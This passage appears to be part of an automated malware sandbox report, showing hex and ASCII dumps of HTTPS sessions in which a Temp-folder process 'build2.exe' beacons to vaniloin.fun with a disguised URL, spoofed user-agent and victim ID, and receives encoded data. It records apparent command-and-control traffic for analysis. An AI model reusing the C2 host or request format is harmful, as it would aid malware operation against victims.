2024-07-26 15:57:24 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 e8 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: ae fd 8f bf fc 18 3f ab aa ce 6f f5 9f 86 ea f3 4f e7 8b aa 7e fc f9 c7 ed f2 de 57 f2 ef e5 b5 1f ab 7e fc f1 97 7f fc 18 f2 a7 ba e6 52 7f be 7a 86 4d 61 da 86 e0 b6 91 9a 75 5d 9a b5 2a 9f 87 2d b7 6e 97 ac 9b be 32 73 3c 97 a6 da 8a e4 b0 45 fb 9f 36 ba 3c 2e c2 57 bd 48 91 71 68 ae 17 fd f9 3a 6a a8 79 f8 fe f7 4e dd 44 1a 5d 4e 6a fc f5 d0 bb b5 f4 df 2f a7 cb 61 8a 9a f7 7b e9 db fd f7 67 ca ce f9 92 d0 b9 66 29 ba 7e 7f 5f 98 88 8b a7 31 71 fe fe 4c da 11 23 06 47 da 8d 8d f0 51 97 77 14 c8 99 1d 4a 10 22 04 c4 8e 74 e1 33 0f c2 4d e5 0b 5b 3c 43 e7 18 dc 2e a5 0f 8d 7c 77 d8 1e 94 73 2b 4c 54 17 3e 9b 8f 26 ec 8e 26 50 a5 85 6a 61 ea eb 6e 98 0b 73 73 39 ee c2 67 61 3a ff 1e e7 f7 b3 85 53 ee a9 9e 59 f5 3e 81 0c 1d b9 f8 4a 3a 06 39 87 17 ce d5 Data Ascii: ?oO~W~RzMau]*-n2s<E6<.WHqh:jyND]Nj/a{gf)~_1qL#GQwJ"t3M[<C.\|ws+LT>&&Pjanss9ga:SY>J:9
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: b4 75 cd a2 45 f6 da fb af bc 3f ce 66 36 89 54 f7 7b 85 4d 64 18 16 65 30 97 1e f2 8b 3d 8c f3 00 e1 48 79 96 ec ea 1d f6 a0 d6 80 10 97 4f 10 60 43 7e 2d de bf 3f ac f5 dc 1b 32 87 63 d4 2b 25 8c c9 3d 52 f4 88 e8 d8 51 25 77 c5 5e 7a c9 5e 86 25 15 31 06 d8 2d 7b ad d1 54 eb 11 a3 53 14 2c cf 7d f9 ff d0 e0 b2 c1 43 66 d4 4a 06 e2 33 37 55 9a 78 d1 48 02 d7 8b 1b d1 0b 33 cc 70 a7 4b c1 72 2f c2 13 19 ed c4 5b a9 a0 8b 4d b9 59 5e 7b 72 2d ff 51 fb dc 0d f6 85 87 e6 ba 95 5e 68 12 00 3b 14 08 91 1b c3 91 cc 5a 03 7c cc a3 e0 a7 19 9b 8f 07 0b 70 9c 51 bc af ba f7 c7 22 7f 6b ed da 1b 3c a4 60 9b 5a c3 ab 54 de 7c 82 75 4b 00 a2 d8 aa 43 9d 31 12 d1 82 59 67 1d aa fb 81 1f 1b e0 15 11 e5 97 16 34 8b 65 ef 77 cd 57 b2 c7 ad ba 65 8d f2 aa de 35 a2 5e c6 Data Ascii: uE?f6T{Mde0=HyO`C~-?2c+%=RQ%w^z^%1-{TS,}CfJ37UxH3pKr/[MY^{r-Q^h;Z\|pQ"k<`ZT\|uKC1Yg4ewWe5^
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 63 2b dc 55 dd f4 76 4a 8c 67 19 c8 cf dc c0 a9 f6 5c fb 04 0e 30 9f 45 2b 3a 9d 3b 96 d8 5b 6e bd d6 e7 9c e8 c6 a6 3c ec 04 3f 00 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 3b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 ae cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee a5 e4 ce 91 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 9e cc c8 00 69 5f 40 62 95 20 df ff 5c 62 ff d0 7c 77 74 a5 ee 94 81 37 09 f8 6e 89 76 d0 cc c3 9e ed f1 98 74 e8 44 3c ad 43 b4 7d 7c ef 37 12 7f b8 65 96 f8 5e 7f 6d d6 87 cf c8 3f 3c ff 0f fe 46 0a 5c ba b6 fe 19 70 0e 32 75 0d ee 8d af b1 e1 04 85 42 3c 9e 59 9b c0 78 a6 b0 b5 39 1f b7 d1 de cd 12 22 41 49 d1 15 ab a1 11 33 5c d4 fd b2 5b d9 73 15 d6 f9 35 bc c7 cd bb 1d 79 b6 97 eb f1 e5 7e 9d 14 50 5d 28 7c 07 9c 0d 69 45 Data Ascii: c+UvJg\0E+:;[n<?jOpD1;j=h&U?%h@Q6PlNf"wi_@b \b\|wt7nvtD<C}\|7e^m?<F\p2uB<Yx9"AI3\[s5y~P](\|iE
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: aa e0 7a ec d0 f9 66 30 94 41 fc df ee db 1c a9 13 e6 2d 30 13 82 a1 ce 12 31 7d 82 53 e2 83 47 45 59 27 58 b8 8f 29 06 91 69 cf 5a f8 cc 88 c6 0f 64 a8 24 03 ce ef 34 a6 34 d9 53 76 aa d1 f7 b6 0a 2b fc d4 75 76 ce 3a 75 4f 2d 57 df f3 bf de ff fb dd 66 83 81 23 92 f4 b0 c9 4d 75 c1 14 7c 9e f8 b8 ab 3c 75 20 0d 34 51 a3 0e b9 57 8f 5c c9 54 10 9d 35 cc 9b 85 ba 8d ce d3 40 ea df eb f4 bd c6 2c 8d bf 7f cb f8 66 fe ef 5a ba 1d ba 7f 9e b7 3c ff e1 39 cb 7f 7d 77 90 3e 1b 53 53 b5 ff 3a 2b 59 eb 1a b5 ef 9a f3 97 e0 e3 a3 e0 8e ca 4c fb 5e 74 ea 56 74 b6 f6 9f d3 57 e1 d7 9f b9 df 5e fe f7 bb 96 ae e7 1e 0d df 6b e7 fb 2c e6 b1 79 7f 1c 1b ef fb ff 1f ba be 0c 5d 77 5f 05 74 4c cd 62 ce b9 d6 b7 e6 3a 9d e3 7f 1f 1a cd c7 fb 67 75 fb f1 97 bf fe e3 47 5d Data Ascii: zf0A-01}SGEY'X)iZd$44Sv+uv:uO-Wf#Mu\|<u 4QW\T5@,fZ<9}w>SS:+YL^tVtW^k,y]w_tLb:guG]
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: c7 0c 67 6e 81 d6 1e 0c 0b 79 e1 e5 4a 9e 81 e8 0e 6d e9 ca e1 60 fa 07 7f fa d2 b1 1f f7 7b ac 3f 4a 13 55 ac f1 4c 7f 94 cf f0 fa f1 b6 7e 2d 9f 5f f6 86 cc fe f1 ec 09 fd 70 24 26 57 1c cf 8f 61 96 f1 4e 24 37 5b 2c f1 37 09 ff 3e 8d 4e e3 76 3b 30 89 99 dc ba 80 99 fa f5 86 7a ab 17 00 10 99 70 d6 78 75 3f ec 5d 26 c0 29 73 23 b1 4d 01 b1 bd 85 22 65 c6 ae 4d 05 29 bb 19 a4 97 d3 26 50 39 76 5a 02 7b 3b 5c cd 19 16 9a 34 6a ca 98 31 83 a3 30 c0 8d 8b 90 69 14 2e 18 a7 11 fc 43 a4 1b 50 25 a6 9a b3 38 b3 01 a7 ed 89 86 13 1f da e6 66 69 88 9b 9b cb a3 0e 88 10 49 34 ac c5 ac 87 cc 0e df 3a 83 59 3f 4a c7 9a 9c 4a 52 22 4a 73 50 10 93 5b 04 26 5d e4 1b 03 5e 57 1d b5 9f 07 15 ea 11 56 a2 32 1c 57 08 4b 8e 3a dd 14 09 a5 9a 54 87 09 2c df 70 99 49 31 a8 Data Ascii: gnyJm`{?JUL~-_p$&WaN$7[,7>Nv;0zpxu?]&)s#M"eM)&P9vZ{;\4j10i.CP%8fiI4:Y?JJR"JsP[&]^WV2WK:T,pI1
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: d3 d8 25 32 96 b3 f5 13 f7 6e 04 c3 e8 d7 24 af 68 00 67 eb c3 66 e7 0c 80 f3 86 ed 66 61 be 93 2c c1 a2 81 5f 40 75 19 01 ec 81 b2 11 59 6b 02 01 7c 80 cd 06 9c b7 f6 39 2e 1b a2 d1 59 0b 31 ae 2b a8 f9 19 97 78 ba 9e 92 04 eb 38 0f b1 da 61 42 cf b8 b8 ab 80 50 16 da 7c e0 2a 5d 2e b6 61 3d 16 a7 f7 ad 25 37 09 0c 17 4a fa a3 b0 2f 74 b2 60 63 c4 b5 32 fd ca 4b dc 91 50 cd 08 cf a1 3e ef 10 50 75 05 0f a4 06 bb 61 21 1b 94 db 98 9a 6d 25 ee 69 db 2b 4b 9f 80 46 c6 7a 5d 13 fe 95 45 1a 44 be bd d3 f7 20 9f 7f 88 83 9f 5b 5b 41 3d 0c 7f 6e 6e 02 8a 0a a9 66 0f 64 38 ff 27 1a e0 86 95 3d 0e 65 8e 2a 9e ff b3 5a f5 13 b7 6b 4c e2 da dd 53 96 36 98 be 35 e0 8b a2 03 ec 6d 83 0f 98 a6 6a 9a 7d d4 30 cf b9 22 24 be 95 ed ae b5 82 4d 0c 6d 44 68 ea 50 61 81 c2 Data Ascii: %2n$hgffa,_@uYk\|9.Y1+x8aBP\|].a=%7J/t`c2KP>Pua!m%i+KFz]ED [[A=nnfd8'=eZkLS65mj}0"$MmDhPa
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: 81 e5 c6 01 f8 80 6e be 68 ae 8d 1a 92 d9 22 7c fb 47 cd 55 a8 b9 72 2b d4 f6 c4 b2 bb dd a3 21 3e c1 52 53 40 cc 0f 98 69 56 28 ab c0 b8 20 06 f5 02 9a 6f 68 bf 82 e6 8f 24 99 81 79 93 8e d4 f5 47 b4 3f 91 f0 93 e1 db ea 74 d9 df bc 02 e8 81 b4 53 49 59 03 c4 1b 90 6e de 93 27 17 a4 fa 97 68 50 4b ef a1 19 2a b3 8e 70 02 6b db 66 44 24 b0 33 79 cf de 43 b1 cd cd c3 41 86 8d 22 07 8e 36 37 b7 cc 9f 0b de bb 60 25 1c fe f7 ea 9b 07 c5 80 f6 9d 10 df 4c b8 27 ef 1c 14 d6 c4 c3 c8 1c ee dd 3d 4d da 8a 0c c4 52 71 54 0a cc 3d d5 5f 29 07 02 fd 8d 5b 75 1c 35 30 b0 47 f8 b3 f1 28 6e 46 7c 56 31 fc 89 c5 6c ca aa 76 67 10 f7 66 c9 bd 26 86 fd fd 33 5d db d6 b3 31 ae 67 3e af 13 4c ea cf 63 28 1c 73 d5 b7 cf 2e dd b8 9a fa 75 a8 12 83 1e ae 82 2c 32 d0 c3 63 12 Data Ascii: nh"\|GUr+!>RS@iV( oh$yG?tSIYn'hPK*pkfD$3yCA"67`%L'=MRqT=_)[u50G(nF\|V1lvgf&3]1g>Lc(s.u,2c
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: c9 15 33 8e 4d 6d 30 cb db c6 1d 95 4b 44 47 2a fe 65 6d 62 82 56 4a e1 cb 97 55 fc 6d 2d fc d8 a1 69 e9 bd ea 7b 41 b9 d4 6c 30 29 3a d9 54 cc 2c 05 5e a2 02 b3 c5 bb 08 19 d8 62 b9 d7 a5 62 06 3c 34 40 2e 25 3c 2e c3 97 e2 9d d1 3b c2 71 73 13 d5 e3 35 1f 0d 77 bd 52 9b 9d 01 9b 76 ce d3 0a 52 52 c7 6b 5d b2 e6 95 0a ae bf 14 a3 21 ab aa 31 20 bd b4 d7 42 bf e6 ac e0 5e 40 6f ac 03 3a 6a 01 54 03 d6 36 21 06 2c ba 37 91 a3 0c 4f d2 f8 12 13 46 bb 84 e9 6e dd 4f 81 45 78 78 68 42 e3 13 1f ac 1d 5f 60 04 f8 9a c2 4f 39 8e dc 8c 8d 17 91 02 eb a3 e5 59 ed 20 d2 12 4f e2 a7 7e 66 86 b7 89 8d 5e 42 dd ad 6d cf 2f c2 ed a0 58 e6 a4 e8 94 cb 4f a1 44 3b d4 2c b4 50 44 ce 14 d0 d2 b6 82 1a 45 be 6a b8 a8 f3 70 b4 81 60 59 46 50 39 3d 99 b2 b8 fb 19 23 90 bc 35 Data Ascii: 3Mm0KDG*embVJUm-i{Al0):T,^bb<4@.%<.;qs5wRvRRk]!1 B^@o:jT6!,7OFnOExxhB_`O9Y O~f^Bm/XOD;,PDEjp`YFP9=#5
2024-07-26 15:57:24 UTC	1390	IN	Data Raw: fd fa f3 8f 27 8f ff d8 06 aa 7b 8f 52 b0 a4 78 a6 f8 ce 72 c4 5f 39 36 74 23 3d a2 5e 64 ed 29 3c 87 d5 63 57 ef 41 05 40 38 0f e8 2f d0 e8 ee 60 78 31 a8 e0 aa 56 f0 9d a3 17 ab 1f c9 83 ee a5 c0 0c d4 43 84 42 20 54 19 07 77 89 e3 f9 04 05 67 92 9e a7 b0 83 ae 1c df b9 60 e3 01 68 2e f0 49 a9 c5 b0 3d 74 1f 03 d9 07 37 09 19 27 70 29 60 8f d4 1e 13 eb a4 2d 83 17 0b 58 58 65 0b 2b 09 80 2e 29 5a 5a 1e 7b 0b 46 a0 a2 7f e9 a8 77 64 98 5b 0e e4 3a 8a 11 91 76 32 04 ed 6a 28 4f 01 04 c6 70 85 84 f6 e7 b3 20 6e 41 39 10 d0 00 a9 42 a0 f8 c0 6e f0 6c 6d 44 a1 12 09 6c f4 67 bf 3f ab ff f1 f8 f1 1c 10 16 b7 35 9a 93 9f 70 5f e2 ca bd 60 c7 46 0f d8 18 13 66 58 1b 01 f9 88 5d 2a e3 a5 e8 eb b3 27 1a 94 30 a2 67 4f 44 be 18 97 0f cf c7 58 11 76 5a 6f 97 3a ea Data Ascii: '{Rxr_96t#=^d)<cWA@8/`x1VCB Twg`h.I=t7'p)`-XXe+.)ZZ{Fwd[:v2j(Op nA9BnlmDlg?5p_`FfX]*'0gODXvZo:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	61271	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:31 UTC	460	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 Content-Length: 96 Host: vaniloin.fun
2024-07-26 15:57:31 UTC	96	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-07-26 15:57:32 UTC	584	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:32 GMT Transfer-Encoding: chunked Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rJtxH36poFhjAfmmbpPBHShdli9owOnIYZ79C8S1hyY0hZ3aqyYQjXN8TaNajY0LQletdlY4Y%2Bj%2Fx6HGKItMFQe1eBAKKJSqTQwky8IpcG3WWAkLGQQysd0KZMi7yjQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9596015938421d-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:57:32 UTC	17	IN	Data Raw: 63 0d 0a 00 00 00 00 cc 55 00 00 82 2f a9 08 0d 0a Data Ascii: cU/
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: 33 37 64 65 0d 0a 00 00 00 00 08 00 ac 08 14 00 ef 05 08 e1 7a ac 08 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 aa d8 e8 e4 c2 ac 9c 86 04 00 56 0a 10 00 c9 09 04 bc 7a 56 0a c5 1e 01 09 0b 1b bc 8d 57 c4 3a 30 c2 a3 39 07 00 d5 00 14 00 f5 04 08 e1 7a d5 00 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 a4 ca c2 d8 ac 9c 86 04 00 b1 03 10 00 28 09 04 bc 7a b1 03 3b 1e 01 09 0b 1b bc 29 5e a4 6c 94 2a 36 6a 06 00 dd 04 14 00 2f 04 08 e1 7a dd 04 77 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 c6 de dc cc d2 ce 08 00 b6 07 14 00 e5 03 08 e1 7a b6 07 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 d0 ca c2 c8 ca e4 e6 54 04 00 36 02 14 00 e4 01 08 e1 7a 36 02 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 54 5c c8 c4 1f 00 cf 01 14 00 bf 07 08 e1 7a cf 01 6b 1e 01 Data Ascii: 37dezkIVdVzVW:09zkIVd(z;)^l*6j/zwIVdz;IVdT6z6;IVdT\zk
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 07 00 90 0a 14 00 3c 06 08 e1 7a 90 0a 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 86 de d2 dc de da d2 05 00 d7 0a 14 00 ed 01 08 e1 7a d7 0a 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 e6 e8 f0 de 54 07 00 76 00 14 00 54 06 08 e1 7a 76 00 72 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 d6 ca f2 68 5c c8 c4 0e 00 b7 08 14 00 f7 0a 08 e1 7a b7 08 72 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 ce ca c6 d6 de be c4 e4 de ee e6 ca e4 e6 10 00 b0 0a 14 00 ee 06 08 e1 7a b0 0a 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 ee c2 d8 d8 ca e8 e6 b8 8a d8 ca c6 e8 e4 ea da 08 00 f3 00 14 00 4e 00 08 d4 7a f3 00 6b 1e 01 09 0b 1b d4 ca 56 cf f0 6d 95 09 51 fb e6 d9 6e 55 6a ef ae 26 00 0d 01 14 00 19 06 08 e1 7a 0d Data Ascii: @<z;IVdz;IVdTvTzvrIVdh\zrIVdz;IVdNzkVmQnUj&z
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: 1b e1 49 56 64 12 15 c7 97 a9 c6 de dc cc d2 ce 06 00 e6 09 14 00 ae 03 08 e1 7a e6 09 59 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 e6 c6 e4 ca ca dc 04 00 17 07 10 00 45 06 04 bc 7a 17 07 3b 1e 01 09 0b 1b bc bd 2c b0 f4 00 58 22 f2 08 00 bc 01 14 00 91 04 08 e1 7a bc 01 93 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 c6 de dc cc d2 ce e6 40 08 00 fa 01 14 00 3d 05 08 e1 7a fa 01 72 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 a0 e4 de cc d2 d8 ca e6 04 00 e5 04 10 00 6d 06 04 bc 7a e5 04 3b 1e 01 09 0b 1b bc 12 de 15 4a af 4b 72 49 08 00 30 03 14 00 43 06 08 d4 7a 30 03 20 1e 01 09 0b 1b d4 12 4b a6 98 73 7b d0 5f 23 fb b0 06 4b 84 36 a0 11 00 e8 04 14 00 84 03 08 e1 7a e8 04 c5 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 c6 d0 e4 de da d2 ea da be c4 e4 de ee Data Ascii: IVdzYIVdEz;,X"zIVd@=zrIVdmz;JKrI0Cz0 Ks{_#K6zIVd
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: c4 05 c5 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 86 de de d6 d2 ca e6 04 00 a6 06 10 00 a1 0b 04 bc 7a a6 06 3b 1e 01 09 0b 1b bc 60 b7 01 3b dc c3 93 3d 04 00 43 07 10 00 7f 05 04 bc 7a 43 07 18 1e 01 09 0b 1b bc e9 e8 64 a0 54 98 f6 a6 08 00 55 00 14 00 62 01 08 e1 7a 55 00 72 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 e0 e4 de cc d2 d8 ca e6 13 00 e8 01 14 00 95 09 08 e1 7a e8 01 18 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 c8 d2 e6 c6 de e4 c8 b8 98 de c6 c2 d8 40 a6 e8 c2 e8 ca 04 00 67 06 10 00 5b 01 04 bc 7a 67 06 3b 1e 01 09 0b 1b bc cb 53 47 4c 77 27 d5 4a 04 00 ba 07 10 00 c6 04 04 bc 7a ba 07 18 1e 01 09 0b 1b bc 2c 36 4b 6a 91 46 d9 6c 04 00 6c 01 10 00 9c 05 04 bc 7a 6c 01 18 1e 01 09 0b 1b bc 34 0c f3 99 89 7c 61 9f 25 00 42 06 14 00 b0 06 Data Ascii: IVdz;`;=CzCdTUbzUrIVdzIVd@g[zg;SGLw'Jz,6KjFllzl4\|a%B
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: c2 04 00 d9 07 10 00 16 00 04 bc 7a d9 07 6b 1e 01 09 0b 1b bc 0e 67 ca 9e b2 13 58 98 04 00 de 07 10 00 ae 05 04 bc 7a de 07 20 1e 01 09 0b 1b bc e5 6c 7f f3 58 18 ed f5 04 00 5a 01 10 00 f9 09 04 bc 7a 5a 01 c5 1e 01 09 0b 1b bc 09 81 3f 10 b4 14 58 13 04 00 f6 01 10 00 73 0b 04 bc 7a f6 01 6b 1e 01 09 0b 1b bc 2a 4c 53 3c 96 38 c1 3a 07 00 35 04 14 00 b8 05 08 e1 7a 35 04 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 d0 d2 e6 e8 de e4 f2 0e 00 7e 09 14 00 a9 06 08 e1 7a 7e 09 20 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 4a 98 de c6 c2 d8 82 e0 e0 88 c2 e8 c2 4a 1f 00 af 06 14 00 33 0b 08 e1 7a af 06 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 ea ec dc c6 40 c4 ec c4 c2 b8 aa d8 e8 e4 c2 ac 9c 86 b8 ea d8 e8 e4 c2 ec dc c6 5c d2 dc d2 08 00 1d 07 14 00 Data Ascii: zkgXz lXZzZ?Xszk*LS<8:5z5kIVd~z~ IVdJJ3zkIVd@\
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: 15 c7 97 a9 c6 de da 5c d8 d2 c4 ca e4 e8 f2 5c d4 c2 f0 f0 b8 92 dc c8 ca f0 ca c8 88 84 b8 cc d2 d8 ca be be 60 5c d2 dc c8 ca f0 ca c8 c8 c4 5c d8 ca ec ca d8 c8 c4 15 00 93 0b 14 00 cc 06 08 e1 7a 93 0b 18 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 e6 d0 de e4 e8 c6 ea e8 e6 5a c6 ea e6 e8 de da 5c d4 e6 de dc 04 00 a6 03 10 00 f6 07 04 bc 7a a6 03 93 1e 01 09 0b 1b bc fe 1f 42 6b 42 6b d0 6d 08 00 6e 09 14 00 f6 02 08 d4 7a 6e 09 20 1e 01 09 0b 1b d4 8e 95 45 71 ba da c7 bb be 25 53 ef 82 25 21 44 07 00 d9 02 14 00 ca 07 08 e1 7a d9 02 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 a4 ca c2 d8 ac 9c 86 23 00 b0 0b 14 00 06 06 08 e1 7a b0 0b 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 a6 de cc e8 ee c2 e4 ca b8 da de dc ca e4 de 5a e0 e4 de d4 ca c6 e8 Data Ascii: \\`\\zIVdZ\zBkBkmnzn Eq%S%!DzkIVd#z;IVdZ
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: 12 15 c7 97 a9 84 e4 c2 ec ca ae c2 d8 d8 ca e8 b8 84 e4 c2 ec ca 40 ae c2 d8 d8 ca e8 40 a6 e8 de e4 c2 ce ca 04 00 bd 06 14 00 35 03 08 e1 7a bd 06 c5 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 98 9e 86 96 04 00 3d 0b 10 00 c4 07 04 bc 7a 3d 0b 3b 1e 01 09 0b 1b bc 59 63 1b 04 e4 17 89 02 08 00 33 00 14 00 d0 02 08 e1 7a 33 00 72 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 c6 ca e4 e8 70 5c c8 c4 13 00 e6 0a 14 00 23 00 08 e1 7a e6 0a 93 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 9e e0 ca dc ac a0 9c b8 c6 de dc cc d2 ce 5a c2 ea e8 de 08 00 41 07 14 00 f5 0a 08 d4 7a 41 07 c5 1e 01 09 0b 1b d4 31 45 fc c0 d3 c8 c4 da 04 f5 ea 5e eb 37 22 25 05 00 8a 05 14 00 cc 08 08 e1 7a 8a 05 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 54 5c ec dc c6 08 00 3d 00 14 00 Data Ascii: @@5zIVd=z=;Yc3z3rIVdp\#zIVdZAzA1E^7"%zkIVdT\=
2024-07-26 15:57:32 UTC	1369	IN	Data Raw: 09 0b 1b e1 49 56 64 12 15 c7 97 a9 e6 ea c4 e6 e6 d0 54 05 00 20 07 14 00 f3 03 08 e1 7a 20 07 6b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 54 5c d8 c4 d8 07 00 36 07 14 00 e6 00 08 e1 7a 36 07 72 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 d6 ca f2 66 5c c8 c4 04 00 c4 01 14 00 af 00 08 e1 7a c4 01 3b 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 e6 e6 d0 54 04 00 0b 03 10 00 bc 03 04 bc 7a 0b 03 3b 1e 01 09 0b 1b bc eb d5 ac 54 56 40 cb 57 08 00 88 07 14 00 e3 05 08 d4 7a 88 07 3b 1e 01 09 0b 1b d4 0d 57 d4 1c 5b ec 4c 20 3c e7 c2 82 63 13 aa df 07 00 c4 02 14 00 a6 04 08 e1 7a c4 02 c5 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 86 de de d6 d2 ca e6 11 00 bd 08 14 00 c1 0a 08 e1 7a bd 08 20 1e 01 09 0b 1b e1 49 56 64 12 15 c7 97 a9 4a a0 e4 de ce e4 c2 da 8c Data Ascii: IVdT z kIVdT\6z6rIVdf\z;IVdTz;TV@Wz;W[L <czIVdz IVdJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	61274	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:32 UTC	515	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 208 Host: vaniloin.fun
